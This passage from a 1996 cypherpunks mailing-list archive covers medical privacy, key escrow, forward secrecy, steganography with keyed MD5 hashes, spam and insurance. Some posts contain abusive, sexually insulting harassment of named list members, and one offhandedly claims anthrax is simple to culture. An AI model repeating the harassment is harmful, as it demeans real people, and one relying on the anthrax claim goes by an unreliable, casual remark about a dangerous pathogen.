much "blinded information" to figure out the correlations between patients
and data. It obviously depends on the amount of information, but it's
possible.

(Recall similar arguments about the census data being sold to direct
marketers: even with blinding of names, correlation was trivial in many
cases. This caused even more people to simply state the number of
(putative) living beings at their address and to "respectfully decline" to
answer the detailed questions about racial makeup ("Mein Censusfuhrer, ich
bin Aryan!"), income levels, diseases,insurance, employer, number of
televisions, etc.)

>OTOH, the potential for mis-use of such records is high, and allowing
>access to a huge number of commercial sites, and their employees,
>certainly opens a lot of holes.

It will be a zoo. Tens of thousands of people will have access to one's
records, and there will be no pretense that the system has even
Clipper-like levels of protection.

A psychotherapist acquaintance of mine is so worried about _existing_
lapses in patient-therapist confidentiality (basically, insurance companies
are demanding detailed summaries of diagnoses and treatments, and demanding
that he give them reports before they will pay...further evidence that
those seeking treatment ought to pay cash and not have insurance companies
in the loop on this sort of thing) that he has become and advocate of using
PGP.


--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 19 Sep 1996 14:35:54 +0800
To: "'cypherpunks@toad.com>
Subject: RE: SPAMS
Message-ID: <01BBA5A9.802E61C0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain





ANY EMAIL ADDRESS PUBLISHED ON THE INTERNET THAT
INVITES COMMERCIAL SOLICITATIONS IS DEEMED AS A
COMMERCIAL ADDRESS, AND AS SUCH IS ELIGABLE FOR
ETHICAL AND LEGAL EMAIL SOLICITATIONS FROM DIRECT
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
aye: there's the rub.
and: don't trust anyone who can't spell.


ELECTRONIC MAIL MARKETERS.

IF FOR ANY REASON YOU OBJECT TO RECEIVING THIS MESSAGE
PLEASE POLITELY REQUEST REMOVAL FROM MY LIST BY CLICKING
ON THE REPLY BUTTON AND ENTERING "REMOVE" IN THE
SUBJECT LINE.   IF YOU DO NOT DO SO, I MUST ASSUME YOU WISH
TO RECEIVE FURTHER MAILINGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 19 Sep 1996 11:56:22 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Re: 56 kbps modems
Message-ID: <v0151011dae66629d0f7f@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


>From "Technical Aspects of Data Communications" by John E. McNamara:

BAUD: A unit of signaling speed equal to the number of discrete conditions
or signal events per second. In asynchronous transmission, the unit of
signaling speed corresponding to one unit interval per second; that is, if
the duration of the unit interval is 20 milliseconds, the signaling speed
is 50 baud. Baud is the same as "bits per second" only if each signal event
represents exactly one bit. A baud is the reciprocal of the unit interval.

In other words, McNamara says (p148), in common 2400 bps modems, the "baud
rate" is 1200 baud.

-Declan


Chris writes:

>On Mon, 16 Sep 1996 12:16:08 +0200, Gary Howland wrote:
>
>>craigw@dg.ce.com.au wrote:
>>> well here in Australia Telstra our national carrier only "garantees"
>>> 2400 baud to work.
>>As I am sure has been discussed at length before, baud does not equal
>>bps.  AFAIK, V32bis is only 2400baud.
>This is correct.  The difference is in the number of values for each of the
>2400 signals sent per second.
>
># Chris Adams <adamsc@io-online.com> |
>http://www.io-online.com/adamsc/adamsc.htp
># cadams@acucobol.com | V.M. (619)515-4894
>"I have never been able to figure out why anyone would want to play games on
>a computer in any case when the whole system is a game.  Word processing,
>spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
>        -- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 19 Sep 1996 15:05:21 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Fear of Flying -- from HotWired
Message-ID: <199609190446.VAA04571@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  2:51 PM 9/18/96 -0400, Black Unicorn wrote:
>On Wed, 18 Sep 1996, Bill Frantz wrote:
>
>> At  1:21 AM 9/18/96 -0400, Black Unicorn wrote:
>> >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote:
>> >> >Gee, biotech has come a long way.  Now I can download the Anthrax DNA
>> >> >sequence from the net and insert it in some carrier bacteria and start
>> >> >making Anthrax bacteria.  Neat!
>> >
>> >Culturing and growing anthrax is painfully simple.  No DNA required.
>> 
>> Sorry Unicorn, you missed my point.  (1) You need DNA to grow bacteria. 
>> You can get the DNA two ways.  (A) You get a sample of the beast, or (B)
>> You get a DNA sequence and then regenerate the DNA.  (I don't think B is
>> technically feasable yet.)  (2) You can't send samples of the beast thru
>> the net.
>
>I think your point was that the net was not responsible for the
>proliferation of Anthrax development data.  (Am I wrong?)

My point was that you need more than just information (but see below).  You
also need some materials that may be hard to get.  Being totally ignorant
in the anthrax growing area, I have no idea where I would get my starter
bacteria.  (Presumably any net-info would tell me.  I haven't looked.)

At 12:34 PM 9/18/96 -0800, Jim McCoy wrote:
>Yes, B is possible.  At the moment the devices only work for relatively
>small sequences but this is improving and the current generation should be
>able to handle a constructing a bacteria sequence pretty well...  Ergo
>you _can_ send samples of the beast through the net (or at least genetic
>clones.)

Oh well, if not this year, then next people will be able to down load any
virus/bacteria they want.  Come the millennium, it will be plants, with
mice and rats to follow.


Black Unicorn wrote:
>My point was that in the eyes of the "leaders" all that is required to
>make the net responsible for the proliferation is for the process to be
>describeable in a simple one or two page set of instructions (such as
>Anthrax is).

I have no problem with your point.  Mine was intended as sarcasm.


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Thu, 19 Sep 1996 14:59:20 +0800
To: cypherpunks@toad.com
Subject: Re: GAK, GAP, GAY
In-Reply-To: <ae657f56110210042afc@[207.167.93.63]>
Message-ID: <v03007801ae6681ded8a1@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


Rabit Wombat wrote:
>Don't get me wrong - I'm not disagreeing with you about how grim your
>points are. I just wanted to point out that information "could" be
>released to researchers without identifying the patient - researchers are
>generally interested in statistical data, such as the incidence of cancer
>per zip code, etc., which doesn't require your name to be released. Zip
>codes are sufficiently populated that this probably is of no danger to
>privacy. 
>
Um.....
Zip code 92067-1234 is my mother's mailing address.
OK, it's not -1234, but there is a 9 digit zip code that is sufficient
to get mail to my mother, and my mother alone.

P.S. This is less than 5 miles outside the city
limits of San Diego; hardly a "low population density" area.

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Sep 1996 12:51:17 +0800
To: cypherpunks@toad.com
Subject: Re: Fuckhead
In-Reply-To: <199609190131.SAA12134@dfw-ix7.ix.netcom.com>
Message-ID: <qeDHuD112w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From xreznorx@ix.netcom.com  Wed Sep 18 21:32:01 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Wed, 18 Sep 96 22:11:56 EDT
	for dlv
Received: from dfw-ix7.ix.netcom.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA27000 for dlv@bwalk.dm.com; Wed, 18 Sep 96 21:32:01 -0400
Received: from  (xreznorx@dby-ct1-15.ix.netcom.com [205.186.164.47]) by dfw-ix7.ix.netcom.com (8.6.13/8.6.12) with SMTP id SAA12134 for <dlv@bwalk.dm.com>; Wed, 18 Sep 1996 18:31:52 -0700
Date: Wed, 18 Sep 1996 18:31:52 -0700
Message-Id: <199609190131.SAA12134@dfw-ix7.ix.netcom.com>
From: xreznorx@ix.netcom.com (The ReznoR)
Subject: Re: Fuckhead
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)

uh, who the fuck r u?

You wrote: 
>
>>From varange@crl.com  Wed Sep 18 10:09:35 1996
>Received: by bwalk.dm.com (1.65/waf)
>	via UUCP; Wed, 18 Sep 96 11:07:01 EDT
>	for dlv
>Received: from mail.crl.com by uu.psi.com 
(5.65b/4.0.061193-PSI/PSINet) via SMTP;
>        id AA17484 for dlv@bwalk.dm.com; Wed, 18 Sep 96 10:09:35 -0400
>Received: from crl11.crl.com by mail.crl.com with SMTP id AA03230
>  (5.65c/IDA-1.5 for <dlv@bwalk.dm.com>); Wed, 18 Sep 1996 07:10:02 
-0700
>Received: by crl11.crl.com id AA21359
>  (5.65c/IDA-1.5 for dlv@bwalk.dm.com); Wed, 18 Sep 1996 07:08:08 
-0700
>From: Troy Varange <varange@crl.com>
>Message-Id: <199609181408.AA21359@crl11.crl.com>
>Subject: Fuckhead
>To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Date: Wed, 18 Sep 1996 07:08:08 -0700 (PDT)
>Priority: Fuckhead
>Precedence: Fuckhead
>Reply-To: dlv@bwalk.dm.com
>In-Reply-To: <Fuckhead>
>X-Mailer: ELM [version 2.4 PL23]
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>Content-Length: 10        
>
>Fuckhead.
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 19 Sep 1996 14:53:51 +0800
To: mab@research.att.com
Subject: cfs users group dead?
Message-ID: <199609190426.WAA20012@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

hi,

is the cfs-users@big.att.com list dead?  i haven't seen anything for
some time and mail i sent just bounced with a bad error.  actually, i
just got another one.  two-for-one bounces if you mail through the
cfs-users list!

thanks for any info,

- -patrick finerty


- -- 
"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
			  finger for PGP key
zifi runs LINUX 2.0.20  -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBMkDLdE3Qo/lG0AH5AQEOxAP+ONckRPOAstOQDroZQcSg+p4nP/OoctNw
fRV+0FvUcUmjaJLe8ziGGSFJK36gnrWTCrfHsoF1BhRoMIoLEuHoRKNiPgrO88HN
FWlWUUJ5Chj84jkLPstHIVAeOPS8RF71okvaWtarqXS6BCFgOByu7PD52VAMD/P4
aE9V2CAjNq8=
=DG+6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 19 Sep 1996 17:36:09 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <Pine.3.89.9609180737.A876-0100000@netcom22>
Message-ID: <3240DD33.28B6@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> On Wed, 18 Sep 1996, Jim Ray wrote:
> I agree, and hope so. "Key Recovery," while not as Orwellian-sounding 
> as "GAK," is a step on the path to honesty WRT the English language,
> though it's important to continually point out, as Tim did in his
> post, that *access* -- rather than just recovery -- is obviously what 
> Mr. Freeh wants.
> I'd count this likely change in terminology as a "cypherpunk victory,"
> albeit a very small and certainly a very hard-fought one.

> Nope. It is a Cypherpunk loss. The use of the term "key recovery" for 
> GAK now fully obfuscates the distinction between accessing a
> backup copy by the legitimate owner (or his estate, employer, etc.)
> and GAK. Many PKIs will support the former type of key recovery. And
> for good reasons. Thanks to the brainwashers using the same term for
> GAK, it will now become impossible to tell from a basic description of 
> a PKI if it supports GAK or not. Furthermore, those who oppose the
> latter type of key recovery (us!), will be pushed further into the
> fringe by the media now being able to mix up our arguments against GAK 
> with arguing against true key recovery. [Do you notice the weird
> constructs I have to use to distinguish the two meanings? One of them 
> being new...]
> --Lucky

My comment: Once the big Corp.'s get used to the new game, they'll put 
the non-critical stuff out there for Mr. Freeh, and for the really 
secret data, if the cops confiscate anything they can't read, the Corp. 
security will put it off on a fall-guy, even as high as the CEO if 
necessary. I just wanna see one case where a federal judge will try to 
bleed a big company for contempt for "refusing" to decode and hand over 
some ostensibly encrypted data. Matter of fact, there are probably cases 
similar to this that have already been through the appeals courts.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: /dev/null@dhp.com (Anonymous)
Date: Thu, 19 Sep 1996 13:21:52 +0800
To: cypherpunks@toad.com
Subject: The daily warning about Timothy May, the ignorant buffoon
Message-ID: <199609190246.WAA07624@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May is widely recognized on the net, because of his
frequent vitriolic postings, as someone/thing ready to cut
off his own penis to spite the testicles, although his few
real-world friends recognize him better from the rear.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 19 Sep 1996 10:49:50 +0800
To: cypherpunks@toad.com
Subject: monkey-wrenching GAK
Message-ID: <199609182148.WAA00346@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



This is along the lines of a technical monkey-wrenching of GAK:

1) The state of email encryption

If the NSA decides they would like to get a decrypt of an email that
you sent, they turn up with a copy of the encrypted email and request
that you decrypt it.

The reason that this is so bad is that you have effectively secret
shared your plaintext between the NSA (who has archived all of your
encrypted email), and yourself who still has they key.  This is not in
your interests.

2) Mandatory GAK

In a future with mandatory GAK, the NSA has all your keys already,
because they have a nice database of them, and so they can decrypt any
thing they feel like.

3) Monkey-wrenching 

Even with GAK, where you are forced to give the government the keys,
you can do much to make the job of administering GAK very expensive.
You start by ensuring that the government can not get your encrypted
data (the other half of the secret share), so that the key is of no
use :-)

You can do this by using a forward secret protocol such as
Diffie-Hellman to exchange data, then you can't provide the encrypted
text to the NSA even if you want to.

But won't they make forward secret protocols illegal at the same time
as enforcing GAK?  Well, maybe they've left it too late already,
consider:

  IP security layers in general - they provides an extra layer of
  encryption that the NSA has to obtain the keys for to make sense of
  their tap.  They may have to archive impossible amounts of IP traffic if
  they can't recognize the type of IP traffic through the IP level
  encryption (www traffic has its uses as cover traffic :-)

  IP security layers which use Diffie-Hellman: forward secrecy means
  that the site owners can't decrypt old IP traffic even if they want
  to.

  When using an IP security layer, email delivered via SMTP will be
  transparently sent over an encrypted link with a random symmetric
  encryption key negotiated with DH.  So the NSA can't get your
  encrypted email so the fact that they have the decryption key
  doesn't help them.

  Even if the NSA had access to the signatory keys used to
  authenticate DH key negotiation, this means that they still have to
  do an active MITM attack on the link.  This is not something they
  can do after the fact.  Bang goes the ability to archive it all and
  present it to people afterwards for decryption.  Also the expense
  and complexity of fishing expeditions become impractical.

  To do a successful MITM attack, the NSA must also subvert the
  authentication key infrastructure, and hope that no one uses a
  subliminal, or out-of-band channel to verify the authentication.

The above arguments, depending on how quickly things like John
Gilmore's S/WAN are deployed, will quickly reduce the Governments
options to:

  attempting to revoke de facto international standard internet
  protocols after the fact

  requesting the authentication keys used to sign DH negotiations, so
  that they can do MITM attacks, and get an IP packet modification
  infrastructure built (something significantly harder, and more
  expensive than the digital telephony bill which is still floundering
  at an estimated $4Bn)

So, to monkey wrench GAK, be an early adopter of IP link level
security, make sure that everybody is using link level security with
forward secrecy, long before Clipper IV gets forced into use as a
voluntary, or possibly later mandatory scheme.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Thu, 19 Sep 1996 14:31:18 +0800
To: sjohnson@packetengines.com
Subject: Re: a simple cypher scheme
Message-ID: <199609190415.XAA08538@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: sjohnson@packetengines.com, cypherpunks@toad.com
Date: Wed Sep 18 23:06:32 1996
>    i've been on cypherpunks for about a year a half now, and have
>  wacthed
> many interesting threads pass by but i've never posited anything.  what
>  has
> brought me out into the open is this : i work for an engineering firm
>  doing
> asic design, i use pgp ( as do all rational persons ), a co-worker here
>  has
> come up with a 'cypher' scheme that he would like to use to send code to
>  our
> clients.  the scheme is this : he would take the file of code and pad
>  all
> lines to the length of the longest line, he would then preform column
>  swaps,
> and then row swaps, to 'mix up' the file. the person receiving the file
> would then preform the opposite functions to recover the file.  it seems
>  so
> simple that it can't be good. i've convenced him to use pgp, but i
>  would
> like some input if possible on why his cypher scheme is not a good one.
> 
> thanx 
> 

Okay... well, in order to undo whatever was done (the column swaps
and row swaps, and the pads), the formula has to be transmitted.
Assuming that someone can intercept that as well as the alleged
cyphertext, it's no-good.  It's the whole "secure channel" issue.
(Also, some information would have to be attached to the file
containing the orignial end-of-lines for each line, or the padding
will be difficult to tell from the legitimate code.)

dave



- ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702
dsmith@prairienet.org        http://www.prairienet.org/~dsmith
send mail with subject of "send pgp-key" for my PGP public key
"The world's at stake. Don't confuse me with details."
 -- Captain America, "Onslaught" ... famous last words

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMkDGyzVTwUKWHSsJAQHD3Af9H+Vq4qFnv9JWPY0E7x8zuXM4Om3zGZ2O
sQYKOR/zAZ6qXLA8a9/C//yMPzRIVf0msd/fytt1PDB+Ei2t7+87EIOjETEwGtOp
hmpioj0IUkYwxAvVV7Ihmw+6bxKCGPolxHekPyjfdI58eZt/aAzh8tcS9X4htxGH
DzgKBm/OEZwMa1PulRWYQdDQmQCN9Cgno87RJn+e1kvE8wgrhYaLy5TOZKl99Vpb
LgXj+CAbMm7WkXZT52scIX/hkcjbMxIEilYX7HfdIFKg7yv3O9ioeba14szafqPd
KOU2DNL1rLA+yHUm0jnNQ6SugnMHRey5/hRq2XSBAyaK4IRagCkslw==
=g6AI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Le Heux <alexlh@yourchoice.nl>
Date: Thu, 19 Sep 1996 10:47:37 +0800
To: hallam@ai.mit.edu
Subject: Re: Spam blacklist project
In-Reply-To: <9609162025.AA00550@etna.ai.mit.edu>
Message-ID: <Pine.SOL.3.91.960918231647.2090I-100000@sarah>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996 hallam@ai.mit.edu wrote:

> 
> Hi,
> 
> 	The following idea just hit me. How about a server which
> maintained a list of people who don't want to recive SPAM? The idea
> being that email recpients who don't want SPAM send their email
> address to the list. A SPAMer who want to check an email to see
> if it is on the list could then obtain the SHA-Digested list of
> addresses and remove them from their internal databases.
> 
Such a beast already exists:

A simple search for 'spam' on www.yahoo.com reveals:

The Internet Spam Control Centre : http://drsvcs.com/nospam/

> 	Of course I don't for a moment imagine that this will
> be 100% effective. Without government regulation there will
> always be slimeballs who send mail to people who don't want it.
> 
I think the internet will be better off without any government 
regulation. Governments tend to make a mess of everything they regulate.

Cheers,

Alex Le Heux

/// I dabble in techno-house and sometimes,
/// I do that badass hip-hop thang...
/// But the F U N K gets me every time!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 19 Sep 1996 13:31:12 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Mercenaries
In-Reply-To: <ae65693e0e021004fa1e@[207.167.93.63]>
Message-ID: <199609190334.XAA30084@nrk.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May sez:
> 
> As to Michelle's point that Americans cannot serve for pay in other
> militaries, there are all sorts of waivers and "look the other way"s
> involved. For example, the retired American officer who became the top
> military man in Estonia (or one of the Baltic States)--while still
> retaining his U.S. citizenship.

But at the loss of his pension, as I recall.
 
> Israel is one of several states which the U.S. allows dual citizenship
> with. 

Not true at all. Read Rich Wales Dual-Cit FAQ.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 19 Sep 1996 17:40:51 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [joke, non-code] Re: Get this for a snake-oil example :)
In-Reply-To: <yu0guD108w165w@bwalk.dm.com>
Message-ID: <Pine.BSF.3.91.960918235026.21516B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



ack barf snort, forgot my lithium, bad 'net night?

-r.w.

On Wed, 18 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> f_estema@alcor.concordia.ca writes:
> > Shamster: SHA-enabled biocomputing hamster.
> 
> I'm sure Timmy would like to wrap one up in duct tape and shove it
> up his ass...
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 19 Sep 1996 17:25:58 +0800
To: cypherpunks@toad.com
Subject: The Beauty of "A la Carte" Insurance Plans
Message-ID: <ae6637ae150210047b34@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:44 PM 9/18/96, jbugden@smtplink.alis.ca wrote:

>I don't speak for the left, nor for the right. I don't think that there is a
>unified voice on either side of the political spectrum. However I do find it
>ironic that market driven health insurance has the potential to be more
>intrusive into personal life than many government systems (cf. genetic
>screening).
>
>If all you do is replace Big Brother with Big Business, then all that has
>changed is the name.

To paraphrase the character in "The Graduate": "One phrase, Benjamin...a la
carte insurance."

I delight in explaining this point to people, and watching the glimmer of
understanding take hold, then watching them realize the implications. I
recall explaining this view a couple of years ago here on this list, but
probably not since then. So, time has come for me to give it another shot.

Is there an alternative to a Giant Corporation (tm) essentially performing
the role of Big Brother? I submit that there is.

Here's what one does. I'll use a concrete example. Suppose that one is not
a homosexual, is not engaging in anal intercourse with partners, is not an
IV drug user, and is not a hemophiliac. Further, suppose that one is
reasonably monogamous (e.g., fewer than several different sex partners a
year, and such partners are themselves not in high-risk groups, as defined
in the first part of this paragraph). Such a person is in a very low risk
group for AIDS.

What one does is to *opt out* of any coverage for AIDS-related coverage.
One opts out completely, signs a waiver to this effect, and absolves the
insurer of any responsibility for AIDS- or ARC-related illnesses.

(This is not perfect, is not "fine-grained" enough, compared to an insurer
doing exhaustive tests and lifestyle interrogations and then offering some
precise rate to be paid. But it has the advantage that the insurer does not
get the exhaustive and intrusive lifestyle information, and the rough cut
of "opting out" is almost certainly OK for most low-risk persons. Your
mileage may vary, in which case you may submit to a detailed lifestyle
analysis. Sadly, many laws exist which don't allow insurance companies to
ask the questions and do the tests needed to establish the risk of getting
AIDS--sort of like not allowing an insurance company to ask if a person is
a low-risk philosopher or a high-risk aircraft test pilot!)

Ditto for any other disease which one can either make a reasonable estimate
of, or can be _tested for_ (tested privately, independently of any
insurance company!). Thus, for the various _genetic_-related diseases, one
can check independently to see if one is a reasonably likely carrier of
such genes, and, if not, can *opt out* of any coverage for those diseases.

This process of *opting out* has the beautiful advantage of taking one's
self out of the "subsidizers" pool while not materially affecting one's
actual risk of being uncovered for some disease or condition. And all
without an intrusive physical exam (though an exam may still be asked for,
etc.).

The parallel is quite close to people opting out of coverage for things
they know they are not at risk for, such as hang-gliding accidents,
horseback-riding accidents, aircraft test piloting, etc. (Such exemptions
are not "enforced" by the insurance company following one around, or
mounting a "position escrow" device on one's body, but by the eminently
reasonable approach of simply not paying off if the accident was due to a
hang-gliding accident, a horseback riding accident, etc.  This is how the
"non-smoker" discounts in auto insurance work...finding strong evidence
that one is actually a smoker (crud in the lungs, cigarette butts all
around the house when living alone, etc.) is positive evidence that one
lied about being a non-smoker, and the policy is cancelled without payout.)

I wish I could say I thought of this strategem of "opting out," but I
believe I read about it some years ago in "Reason" or "Liberty." It
understandably outrages liberals, who realize that people will arrange
private tests for themselves, and will then opt out of a la carte coverage
of diseases they reasonably believe are unlikely to affect them. (Nothing
is certain, of course, and there is some chance that if one opts of
coverage for Lou Gehrig Disease, or MS, or AIDS, that one may still end up
with one of these diseases. TANSTAAFL, and most people will jump at the
chance to remove themselves from a pool for something they feel they are
very unlikely to get.)

To relate this to the other examples, if one opts out of SCUBA-diving
coverage, because one is not a SCUBA diver, this does not require the
insurance company to intrusively investigate one's life. Diving accidents
just don't get covered, period.

Some have argued that a la carte insurance should be banned, for precisely
this reason, that people will always be able to "game against" the rules.
(To make this clear, the flip side of someone opting out of coverage for
Disease A is that someone else may already know they are very likely to
have Disease A or be at strong risk for Disease A. Forcing an insurance
company to accept all applicants means this second category can game
against the system, getting more out of the system than they expect to put
in.)

Supporting the "opting out" or "a la carte" approach to insurance allows
personal privacy to be maximally preserved.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Thu, 19 Sep 1996 17:50:33 +0800
To: Jim Miller <jim@suite.suite.com>
Subject: Re:really undetectable crypto made somewhat practical
In-Reply-To: <199609190126.VAA01522@beast.brainlink.com>
Message-ID: <Pine.BSF.3.91.960918231937.568B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm on FCPUNX instead of regular Cypherpunks, so please excuse me if I'm a
little behind the thread. 

> New Scheme:  First, calculate the MD5 hash of all the words in the various  
> dictionary files used by the password cracker program and create a  
> database containing every word and the first 4 bits of its MD5 hash.   
> Given such a database, it would be possible to write a program that  
> accepts as input a block of cyphertext (the stego message, encrypted),  
> chunks it up in to groups of 4 bits and then, for each chunk, displays the  
> words that have hashes that start with those same four bits.  The person  
> running the program would select words that form meaningful sentences but  
> also produce hashes that combine into the encrypted stego message.  This  
> scheme would send 4 stego bits per word.

As a slight improvement, you could turn this into a complete stealth
encryption scheme, using only the one-way hash function operating as a
MAC. 

Instead of hashing just the word in an effort to get stego bits, you could
hash a key along with the word. In order to get the intended hash you
would need to know the key. Since you're probably hashing a whole block of
512 bits (or whatever's specified in the algorithm) appending a key should
not affect the speed of the system. I'm certain that this would increase
the security, possibly enough that you wouldn't need to use a regular
encryption algorithm (but I wouldn't bet on it). 

Crude example:
Assume that Alice can use the words "Greetings" and "Salutations"
interchangably without drawing suspicion. Also assume that "PASSWD" is a
secret known only to Alice and Bob, and that the stego software looks at
the low bit of an MD5 hash. 

MD5 ("GreetingsPASSWD")   = c7bf6e051731a0dcf52baa330c9d2e7d  <- low bit=1
MD5 ("SalutationsPASSWD") = 2dd2ba080b5feb060ffbc6d196fd1b34  <- low bit=0

If you say "Greetings" you're sending a 1, if you say "Salutations" 
you're sending a 0. Eve doesn't know about "PASSWD" so she can't do the
hash and figure the bit. Of course, if you're using this to send more
bits, you'll need something harder to guess than "PASSWD". 

The trick is in figuring out which words have stego bits and which don't. 
It might be better to stego bits into a whole line instead of a word, as
that would probably offer more flexibility. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 19 Sep 1996 14:51:10 +0800
To: Jim Byrd <byrd@ACM.ORG>
Subject: Re: SSN database scam?
In-Reply-To: <2.2.32.19960918141242.006e9b48@super.zippo.com>
Message-ID: <Pine.SUN.3.94.960919003700.15630B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Sep 1996, Jim Byrd wrote:

> At 01:22 PM 9/18/96 +0200, Gary Howland <gary@systemics.com> forwarded:
> >Forwarded from www-security mailing list.
> [snip]
> 
> >Can anybody comment on the item forwarded below my sig file? It claims
> >there's a database w/ people's credit card no's etc on it and you have to
> >give your name and social security number to get off of it.  This strikes
> >me as being a scam to get your ssn, but this went around at work and
> >people are actually calling and giving it out.  I know ssn's aren't really
> >as secure as they're supposed to be, but  still...
